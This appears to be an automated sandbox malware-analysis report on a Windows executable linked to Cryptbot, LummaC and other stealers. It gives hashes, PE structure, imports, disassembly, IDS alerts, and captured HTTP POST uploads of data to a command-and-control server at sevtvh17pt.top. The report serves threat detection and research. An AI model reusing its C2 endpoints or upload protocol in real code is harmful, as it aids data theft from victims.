	file.exe	Get hash	malicious	LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, Socks5Systemz	Browse	176.113.115.95
	https://www.lightsourcebp.com/	Get hash	malicious	Unknown	Browse	37.9.4.115
	file.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot, Neoreklami, Socks5Systemz	Browse	84.38.182.221
	file.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	37.9.4.189
	file.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	84.38.182.221
	file.exe	Get hash	malicious	LummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Socks5Systemz	Browse	176.113.115.95
	file.exe	Get hash	malicious	LummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer	Browse	5.53.124.195

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	315803136
Entropy (8bit):	0.05436916105421156
Encrypted:	false
SSDEEP:	24576:DjMXwB2/vtTwIj/SMdLcgUhTwpzbUkWrn3NDfcHVSyn8W8xlfVE:SEw13WrnpfaVYxlfVE
MD5:	6E1E9F37E2B7BE5FBAC02CD852F3E8F9
SHA1:	5C67A906E12EC0CE68BB2008AA0BF4601713384C
SHA-256:	A506724EE1748D3C0BACE90A2AA61EA3375E0DE9ECAB7330CD8A4F1BF704004D
SHA-512:	5BBA32ACD38A67C27CAB80A53E12726BA72FFAD39BA9B82F28372AD56C345BA8E71559738BE1B093E2CBDBD7AA38B5E6E656095E777FC1F983E0D1570E26AA93
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f...........#...(..........................\g.........................@.......c....@... .........................`.......................................Lz...........................=.........................t............................text...8...........................`..`.data...............................@....rdata..0...........................@..@.eh_framX...........................@..@.bss.........p...........................edata..`............:..............@..@.idata...............<..............@....CRT....,............F..............@....tls.................H..............@....reloc..Lz.......\|...J..............@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\service123.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	314617856
Entropy (8bit):	0.002340594165386923
Encrypted:	false
SSDEEP:
MD5:	4D55689820C303548CBA9CFA9F2BF3CB
SHA1:	9E362CACAF1936926BD7A60A6B1E377CBE290ABD
SHA-256:	FE9D2ED7E50F2C1712E58ABDE7718ADC894E3E8D7AC9E2C4C2CD82A4257A9383
SHA-512:	6B6B9A08AA74675E138030BE71C94CEC18725647388E354FDB5F88B223B3BE3433BBB6B25A11AB7499EACBFB49B2A29AE435E3A4F6293BA54E1464E41307706E
Malicious:	true
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f...............(.v........................@.......................... .......*....@... .................................................................d...........................D.......................T................................text....t.......v..................`..`.data...T............z..............@....rdata...............\|..............@..@.eh_fram............................@..@.bss....t................................idata..............................@....CRT....0...........................@....tls................................@....reloc..d...........................@..B........................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit):	2.7922501078429534
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	9'994'752 bytes
MD5:	0603207308448ad82dc3d1fc17923ddb
SHA1:	9c4f8f3e35d6404e22b50b7f1a0641a1b4195d94
SHA256:	0fb82d8a8edd32ba4f80b129b228c9e74871f55f970b44c75af5aa4572b1b582
SHA512:	50595287ba90421dbb6fc612b69d2a2bffdad54ff79b04c50a05ea414af4e7deeb7101fb1b0638257cb28d3627ef8258e7cb039178b6d504d922774e91f95ba5
SSDEEP:	49152:bDyQaXzVDlZO+jPtICKFgYvB+um+uWXHAEUk9Nd1aKXTjTgwpZp5m2GyP/UscElJ:iQQZDlBPtTY
TLSH:	04A6D462DD8781FEE5931DB9A016B37F2634EB05881DCA78DF80DBD1DB31A78D4AA011
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f...............(.N,..~...............`,...@.................................DG....@... ......................p..B..

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x4014a0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x66F7D8B8 [Sat Sep 28 10:21:44 2024 UTC]
TLS Callbacks:	0x401800, 0x4017b0
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	208ad2c8c137e3d4c33022e4bb87e9bb

Entrypoint Preview

Instruction
mov dword ptr [00D46070h], 00000001h
jmp 00007F3D58C539C6h
nop
mov dword ptr [00D46070h], 00000000h
jmp 00007F3D58C539B6h
nop
sub esp, 1Ch
mov eax, dword ptr [esp+20h]
mov dword ptr [esp], eax
call 00007F3D58C620C6h
cmp eax, 01h
sbb eax, eax
add esp, 1Ch
ret
nop
nop
nop
nop
nop
nop
nop
nop
push ebp
mov ebp, esp
push edi
push esi
push ebx
sub esp, 1Ch
mov dword ptr [esp], 00D38000h
call dword ptr [00D4822Ch]
sub esp, 04h
test eax, eax
je 00007F3D58C53D85h
mov ebx, eax
mov dword ptr [esp], 00D38000h
call dword ptr [00D4824Ch]
mov edi, dword ptr [00D48234h]
sub esp, 04h
mov dword ptr [00D46028h], eax
mov dword ptr [esp+04h], 00D38013h
mov dword ptr [esp], ebx
call edi
sub esp, 08h
mov esi, eax
mov dword ptr [esp+04h], 00D38029h
mov dword ptr [esp], ebx
call edi
sub esp, 08h
mov dword ptr [006C6004h], eax
test esi, esi
je 00007F3D58C53D23h
mov dword ptr [esp+04h], 00D4602Ch
mov dword ptr [esp], 00D43104h
call esi
mov dword ptr [esp], 00401580h
call 00007F3D58C53C73h
lea esp, dword ptr [ebp-0Ch]
pop ebx
pop esi

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x947000	0x42	.edata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x948000	0xa98	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x94b000	0x44444	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x941124	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x94820c	0x1a8	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2c4d18	0x2c4e00	d5af9fb1c9883282b69a561117a5832f	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x2c6000	0x671024	0x671200	4820710f431eaf7d900fecb9b6c08806	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x938000	0xa254	0xa400	e27277dfb488383ba76fda11628323da	False	0.37964462652439024	data	4.46559492219033	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.eh_fram	0x943000	0x21d8	0x2200	7733f6381e3f3feec6f8733c390ec463	False	0.3254825367647059	data	4.871924170185062	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.bss	0x946000	0xb74	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata	0x947000	0x42	0x200	8eec2f6f3f5dcedfd5bb51464e6a7e67	False	0.123046875	data	0.7272198426899718	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.idata	0x948000	0xa98	0xc00	a4ddc7dee7c4c1ac11db7e0a2a7001dd	False	0.3828125	data	4.842301882278895	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT	0x949000	0x30	0x200	947565758601e59a9e2e145caaaaefe2	False	0.064453125	data	0.2044881574398449	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x94a000	0x8	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x94b000	0x44444	0x44600	4716987d16ed5927610525c91e1ae875	False	0.16826154021937842	data	6.7566311254176545	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
ADVAPI32.dll	CryptAcquireContextA, CryptGenRandom, CryptReleaseContext
KERNEL32.dll	DeleteCriticalSection, EnterCriticalSection, FreeLibrary, GetLastError, GetModuleHandleA, GetModuleHandleW, GetProcAddress, GetStartupInfoA, GetTempPathA, InitializeCriticalSection, IsDBCSLeadByteEx, LeaveCriticalSection, LoadLibraryA, MultiByteToWideChar, SetUnhandledExceptionFilter, Sleep, TlsGetValue, VirtualProtect, VirtualQuery, WideCharToMultiByte, lstrlenA
msvcrt.dll	__getmainargs, __initenv, __mb_cur_max, __p__acmdln, __p__commode, __p__fmode, __set_app_type, __setusermatherr, _amsg_exit, _assert, _cexit, _errno, _chsize, _exit, _filelengthi64, _fileno, _initterm, _iob, _lock, _onexit, _unlock, abort, atoi, calloc, exit, fclose, fflush, fgetpos, fopen, fputc, fread, free, freopen, fsetpos, fwrite, getc, islower, isspace, isupper, isxdigit, localeconv, malloc, memcmp, memcpy, memmove, memset, mktime, localtime, difftime, _mkdir, perror, puts, realloc, remove, setlocale, signal, strchr, strcmp, strerror, strlen, strncmp, strncpy, strtol, strtoul, tolower, ungetc, vfprintf, time, wcslen, wcstombs, _stat, _write, _utime, _open, _fileno, _close, _chmod
SHELL32.dll	ShellExecuteA

Exports

Name	Ordinal	Address
main	1	0x5b13b0

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-29T01:02:37.719946+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.10	49706	37.9.4.189	80	TCP
2024-09-29T01:02:41.186134+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.10	49708	37.9.4.189	80	TCP
2024-09-29T01:02:46.011222+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.10	49712	37.9.4.189	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 29, 2024 01:02:37.022218943 CEST	49706	80	192.168.2.10	37.9.4.189
Sep 29, 2024 01:02:37.027188063 CEST	80	49706	37.9.4.189	192.168.2.10
Sep 29, 2024 01:02:37.027285099 CEST	49706	80	192.168.2.10	37.9.4.189
Sep 29, 2024 01:02:37.027477980 CEST	49706	80	192.168.2.10	37.9.4.189
Sep 29, 2024 01:02:37.027498960 CEST	49706	80	192.168.2.10	37.9.4.189
Sep 29, 2024 01:02:37.032263994 CEST	80	49706	37.9.4.189	192.168.2.10
Sep 29, 2024 01:02:37.032275915 CEST	80	49706	37.9.4.189	192.168.2.10
Sep 29, 2024 01:02:37.719841003 CEST	80	49706	37.9.4.189	192.168.2.10
Sep 29, 2024 01:02:37.719867945 CEST	80	49706	37.9.4.189	192.168.2.10
Sep 29, 2024 01:02:37.719945908 CEST	49706	80	192.168.2.10	37.9.4.189
Sep 29, 2024 01:02:37.720016003 CEST	49706	80	192.168.2.10	37.9.4.189
Sep 29, 2024 01:02:37.725172043 CEST	80	49706	37.9.4.189	192.168.2.10
Sep 29, 2024 01:02:41.126949072 CEST	49708	80	192.168.2.10	37.9.4.189
Sep 29, 2024 01:02:41.132054090 CEST	80	49708	37.9.4.189	192.168.2.10
Sep 29, 2024 01:02:41.132133007 CEST	49708	80	192.168.2.10	37.9.4.189
Sep 29, 2024 01:02:41.132430077 CEST	49708	80	192.168.2.10	37.9.4.189
Sep 29, 2024 01:02:41.132534981 CEST	49708	80	192.168.2.10	37.9.4.189
Sep 29, 2024 01:02:41.137686968 CEST	80	49708	37.9.4.189	192.168.2.10
Sep 29, 2024 01:02:41.137705088 CEST	80	49708	37.9.4.189	192.168.2.10
Sep 29, 2024 01:02:41.137736082 CEST	80	49708	37.9.4.189	192.168.2.10
Sep 29, 2024 01:02:41.137737036 CEST	49708	80	192.168.2.10	37.9.4.189
Sep 29, 2024 01:02:41.137773037 CEST	49708	80	192.168.2.10	37.9.4.189
Sep 29, 2024 01:02:41.137774944 CEST	80	49708	37.9.4.189	192.168.2.10
Sep 29, 2024 01:02:41.137800932 CEST	80	49708	37.9.4.189	192.168.2.10
Sep 29, 2024 01:02:41.137805939 CEST	49708	80	192.168.2.10	37.9.4.189
Sep 29, 2024 01:02:41.137814045 CEST	80	49708	37.9.4.189	192.168.2.10
Sep 29, 2024 01:02:41.137820959 CEST	49708	80	192.168.2.10	37.9.4.189
Sep 29, 2024 01:02:41.137826920 CEST	80	49708	37.9.4.189	192.168.2.10
Sep 29, 2024 01:02:41.137840986 CEST	80	49708	37.9.4.189	192.168.2.10
Sep 29, 2024 01:02:41.137845039 CEST	49708	80	192.168.2.10	37.9.4.189
Sep 29, 2024 01:02:41.137852907 CEST	80	49708	37.9.4.189	192.168.2.10
Sep 29, 2024 01:02:41.137866974 CEST	49708	80	192.168.2.10	37.9.4.189
Sep 29, 2024 01:02:41.137867928 CEST	80	49708	37.9.4.189	192.168.2.10
Sep 29, 2024 01:02:41.137887955 CEST	49708	80	192.168.2.10	37.9.4.189
Sep 29, 2024 01:02:41.137902021 CEST	49708	80	192.168.2.10	37.9.4.189
Sep 29, 2024 01:02:41.137924910 CEST	49708	80	192.168.2.10	37.9.4.189
Sep 29, 2024 01:02:41.142653942 CEST	80	49708	37.9.4.189	192.168.2.10
Sep 29, 2024 01:02:41.142710924 CEST	49708	80	192.168.2.10	37.9.4.189
Sep 29, 2024 01:02:41.142718077 CEST	80	49708	37.9.4.189	192.168.2.10
Sep 29, 2024 01:02:41.142730951 CEST	80	49708	37.9.4.189	192.168.2.10
Sep 29, 2024 01:02:41.142762899 CEST	49708	80	192.168.2.10	37.9.4.189
Sep 29, 2024 01:02:41.142772913 CEST	49708	80	192.168.2.10	37.9.4.189
Sep 29, 2024 01:02:41.142776012 CEST	80	49708	37.9.4.189	192.168.2.10
Sep 29, 2024 01:02:41.142788887 CEST	80	49708	37.9.4.189	192.168.2.10
Sep 29, 2024 01:02:41.142802954 CEST	80	49708	37.9.4.189	192.168.2.10
Sep 29, 2024 01:02:41.142818928 CEST	49708	80	192.168.2.10	37.9.4.189
Sep 29, 2024 01:02:41.142834902 CEST	49708	80	192.168.2.10	37.9.4.189
Sep 29, 2024 01:02:41.142858982 CEST	49708	80	192.168.2.10	37.9.4.189
Sep 29, 2024 01:02:41.185957909 CEST	80	49708	37.9.4.189	192.168.2.10
Sep 29, 2024 01:02:41.186134100 CEST	49708	80	192.168.2.10	37.9.4.189
Sep 29, 2024 01:02:41.234066963 CEST	80	49708	37.9.4.189	192.168.2.10
Sep 29, 2024 01:02:41.234185934 CEST	49708	80	192.168.2.10	37.9.4.189
Sep 29, 2024 01:02:41.282026052 CEST	80	49708	37.9.4.189	192.168.2.10
Sep 29, 2024 01:02:41.601428986 CEST	80	49708	37.9.4.189	192.168.2.10
Sep 29, 2024 01:02:42.053395987 CEST	80	49708	37.9.4.189	192.168.2.10
Sep 29, 2024 01:02:42.053594112 CEST	49708	80	192.168.2.10	37.9.4.189
Sep 29, 2024 01:02:42.053672075 CEST	80	49708	37.9.4.189	192.168.2.10
Sep 29, 2024 01:02:42.053740025 CEST	49708	80	192.168.2.10	37.9.4.189
Sep 29, 2024 01:02:42.059708118 CEST	80	49708	37.9.4.189	192.168.2.10
Sep 29, 2024 01:02:45.205534935 CEST	49712	80	192.168.2.10	37.9.4.189
Sep 29, 2024 01:02:45.210438967 CEST	80	49712	37.9.4.189	192.168.2.10
Sep 29, 2024 01:02:45.210551023 CEST	49712	80	192.168.2.10	37.9.4.189
Sep 29, 2024 01:02:45.210664988 CEST	49712	80	192.168.2.10	37.9.4.189
Sep 29, 2024 01:02:45.210787058 CEST	49712	80	192.168.2.10	37.9.4.189
Sep 29, 2024 01:02:45.215493917 CEST	80	49712	37.9.4.189	192.168.2.10
Sep 29, 2024 01:02:45.215513945 CEST	80	49712	37.9.4.189	192.168.2.10
Sep 29, 2024 01:02:45.215585947 CEST	49712	80	192.168.2.10	37.9.4.189
Sep 29, 2024 01:02:45.215610981 CEST	80	49712	37.9.4.189	192.168.2.10
Sep 29, 2024 01:02:45.215620995 CEST	80	49712	37.9.4.189	192.168.2.10
Sep 29, 2024 01:02:45.215672970 CEST	80	49712	37.9.4.189	192.168.2.10
Sep 29, 2024 01:02:45.215677977 CEST	49712	80	192.168.2.10	37.9.4.189
Sep 29, 2024 01:02:45.215682983 CEST	80	49712	37.9.4.189	192.168.2.10
Sep 29, 2024 01:02:45.215692043 CEST	80	49712	37.9.4.189	192.168.2.10
Sep 29, 2024 01:02:45.215699911 CEST	80	49712	37.9.4.189	192.168.2.10
Sep 29, 2024 01:02:45.215715885 CEST	80	49712	37.9.4.189	192.168.2.10
Sep 29, 2024 01:02:45.215724945 CEST	80	49712	37.9.4.189	192.168.2.10
Sep 29, 2024 01:02:45.215739012 CEST	49712	80	192.168.2.10	37.9.4.189
Sep 29, 2024 01:02:45.215783119 CEST	49712	80	192.168.2.10	37.9.4.189
Sep 29, 2024 01:02:45.220478058 CEST	80	49712	37.9.4.189	192.168.2.10
Sep 29, 2024 01:02:45.220520973 CEST	80	49712	37.9.4.189	192.168.2.10
Sep 29, 2024 01:02:45.220575094 CEST	80	49712	37.9.4.189	192.168.2.10
Sep 29, 2024 01:02:45.220583916 CEST	80	49712	37.9.4.189	192.168.2.10
Sep 29, 2024 01:02:45.220632076 CEST	80	49712	37.9.4.189	192.168.2.10
Sep 29, 2024 01:02:45.220649004 CEST	80	49712	37.9.4.189	192.168.2.10
Sep 29, 2024 01:02:45.261970043 CEST	80	49712	37.9.4.189	192.168.2.10
Sep 29, 2024 01:02:46.011080027 CEST	80	49712	37.9.4.189	192.168.2.10
Sep 29, 2024 01:02:46.011156082 CEST	80	49712	37.9.4.189	192.168.2.10
Sep 29, 2024 01:02:46.011221886 CEST	49712	80	192.168.2.10	37.9.4.189
Sep 29, 2024 01:02:46.011317015 CEST	49712	80	192.168.2.10	37.9.4.189
Sep 29, 2024 01:02:46.016169071 CEST	80	49712	37.9.4.189	192.168.2.10

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 29, 2024 01:02:36.595330000 CEST	57587	53	192.168.2.10	1.1.1.1
Sep 29, 2024 01:02:37.016463041 CEST	53	57587	1.1.1.1	192.168.2.10
Sep 29, 2024 01:02:56.785845995 CEST	53	65401	162.159.36.2	192.168.2.10
Sep 29, 2024 01:02:57.246984005 CEST	64081	53	192.168.2.10	1.1.1.1
Sep 29, 2024 01:02:57.254136086 CEST	53	64081	1.1.1.1	192.168.2.10

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 29, 2024 01:02:36.595330000 CEST	192.168.2.10	1.1.1.1	0xce96	Standard query (0)	sevtvh17pt.top	A (IP address)	IN (0x0001)	false
Sep 29, 2024 01:02:57.246984005 CEST	192.168.2.10	1.1.1.1	0xbc11	Standard query (0)	198.187.3.20.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 29, 2024 01:02:37.016463041 CEST	1.1.1.1	192.168.2.10	0xce96	No error (0)	sevtvh17pt.top		37.9.4.189	A (IP address)	IN (0x0001)	false
Sep 29, 2024 01:02:57.254136086 CEST	1.1.1.1	192.168.2.10	0xbc11	Name error (3)	198.187.3.20.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false

HTTP Request Dependency Graph

sevtvh17pt.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.10	49706	37.9.4.189	80	7680	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Sep 29, 2024 01:02:37.027477980 CEST	333	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary46956507 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 413 Host: sevtvh17pt.top
Sep 29, 2024 01:02:37.027498960 CEST	413	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 34 36 39 35 36 35 30 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4c 65 6b Data Ascii: ------Boundary46956507Content-Disposition: form-data; name="file"; filename="Lekuwusul.bin"Content-Type: application/octet-streamn_9fecA8}6:-T@ZPaQuHijB.nbuMPiDRK+"q")
Sep 29, 2024 01:02:37.719841003 CEST	209	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 (Ubuntu) Date: Sat, 28 Sep 2024 23:02:37 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 2 Connection: close ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc" Data Raw: 4f 4b Data Ascii: OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.10	49708	37.9.4.189	80	7680	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Sep 29, 2024 01:02:41.132430077 CEST	335	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary25984815 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 76061 Host: sevtvh17pt.top
Sep 29, 2024 01:02:41.132534981 CEST	11124	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 32 35 39 38 34 38 31 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4c 65 6b Data Ascii: ------Boundary25984815Content-Disposition: form-data; name="file"; filename="Lekukekec.bin"Content-Type: application/octet-stream>RngC\|uVOdw#@6)igxY:5?2 -k[1RKH8
Sep 29, 2024 01:02:41.137737036 CEST	1236	OUT	Data Raw: 2a 52 d5 cd 68 0b da 5d d7 01 97 0a 2c 53 41 9e 14 95 7e 84 97 ea 99 6e 3c b1 df 90 33 74 15 55 42 07 14 ad 8b b3 73 30 b6 75 58 9f 1c fc 34 07 c4 7b e9 18 d5 03 89 bc 30 f8 fc ee 07 1a a0 f9 0e df 4b b6 64 2e bd 97 14 b8 c0 ee 57 81 53 f2 26 34 Data Ascii: *Rh],SA~n<3tUBs0uX4{0Kd.WS&4\YlGg_e:J.ov\|ZEw}XC@mBCes?2SSSTs/M-R"FLHXPu+D%}9`<5]{
Sep 29, 2024 01:02:41.137773037 CEST	2472	OUT	Data Raw: b9 f3 fa d9 65 35 dc 3f e9 70 8a e3 9b 45 53 e3 c2 90 84 72 db e7 c5 96 25 e6 ab f9 3a c0 32 0d 3f 92 9a f9 bd 0f 81 e4 3e eb 3a 02 02 bc ff 9d ef 2f f6 d4 31 8b c5 4d 9f b1 66 46 56 a3 23 49 ec 14 ef d4 84 e2 d6 f0 fa 9a 06 5d 6c 63 42 54 83 9c Data Ascii: e5?pESr%:2?>:/1MfFV#I]lcBT1265sav24{J7\|+`eC%bvy.kv03(P$ `4/7v%h;'%c~s ueF@-
Sep 29, 2024 01:02:41.137805939 CEST	2472	OUT	Data Raw: 92 92 a2 b4 96 8d f0 27 2d 11 db 57 8a dd 91 0d b7 36 95 c7 38 ed 20 af 3a 3b 43 01 ce 2a b8 f0 35 f8 f8 88 f6 6a 57 2e 5c 89 39 ae 17 c8 0b 6a 51 63 38 2c ca 22 42 a3 8d 46 af eb da ab 49 d1 a7 cb 2f a5 a2 8a ea 5c 6a 8f a0 97 4c 2b 99 a4 41 d1 Data Ascii: '-W68 :;C5jW.\9jQc8,"BFI/\jL+Aob\|Vu&CE3H^M-cw<4ALbk[cIK5[g=;UIANf]LUHoMYt)O 5W\|(CE~5weN\8
Sep 29, 2024 01:02:41.137820959 CEST	2472	OUT	Data Raw: 98 52 da 7b 9a 52 79 f3 42 14 fb 7a ec 88 aa ef 7a 29 70 ec c9 90 4b fe e7 02 42 a1 80 ad c5 dd 88 ac b8 7d c6 1a 4c 95 58 68 78 ca 12 44 1f ba e2 16 1a 35 66 02 d0 98 cc cd 64 8f 27 bb 03 43 33 f4 29 f6 86 59 53 63 b4 39 0b d1 d3 33 38 37 fd 51 Data Ascii: R{RyBzz)pKB}LXhxD5fd'C3)YSc9387Q\~_'N"==aK{DP:CfR_}T@_\o`gRIPaK,YPo9lmy/?~8?FO`J*Yns%:
Sep 29, 2024 01:02:41.137845039 CEST	2472	OUT	Data Raw: 4f d1 5c 7a f6 81 03 22 5a f0 34 f0 d6 49 05 27 c2 6a 68 0e 34 f1 58 28 13 b9 bd 4b e6 80 40 7c 7a c6 4b e7 2b 6e 05 e8 9d b3 68 48 a9 c5 0f b5 e3 7e d5 99 2c 51 0b d7 a6 93 a4 0a a3 75 aa d9 ea 17 84 d6 a0 05 88 e7 da a7 fe 49 66 ec 4e 69 35 85 Data Ascii: O\z"Z4I'jh4X(K@\|zK+nhH~,QuIfNi5DY~;WX?L z,vvT>mrgeE3i=&Fy:jnr'Gwr&A>);u@zGS(-MVa2_#icw,%4
Sep 29, 2024 01:02:41.137866974 CEST	2472	OUT	Data Raw: 34 7a 31 a7 0c 37 ea bb 69 e1 43 97 03 37 2d ba 60 48 7f d0 87 cc d3 c5 8c 32 f1 e0 f9 d6 4e 86 41 3a 4d d7 64 0e ba 53 0f 29 5d 7d f1 57 b2 1a 7c 1b 09 35 81 c6 17 9a 56 06 73 2e 79 59 36 fe 91 b4 fc 75 32 52 ce b0 8b 52 ae 43 93 ee 34 5a 00 11 Data Ascii: 4z17iC7-`H2NA:MdS)]}W\|5Vs.yY6u2RRC4Z!v4'!0u&F.\BaHamGJ8*"NW#E}VD?1-P{r O+)uEx:'e9@1
Sep 29, 2024 01:02:41.137887955 CEST	4944	OUT	Data Raw: 65 f6 f4 90 aa ef a5 23 3e 84 da d0 3e f5 24 97 9a 84 69 29 5a 2f bb 06 60 17 61 f8 af 7a d0 c8 74 aa b6 ba a2 b8 87 bd ba f7 08 c8 bb ad 23 dd ad 30 1c c0 4a 70 f2 fe af 3c 4f c5 7e ac 98 5d af b3 43 3b 53 e3 d7 0b f2 07 db 9d 25 8d 83 a6 c3 3c Data Ascii: e#>>$i)Z/`azt#0Jp<O~]C;S%<sL`RkkTp%0>>vvp kMP}&sq_Y/76x3u!_t]WI5w+QFR bcOR0_U{#w9I$/i(7[=}OH0f'
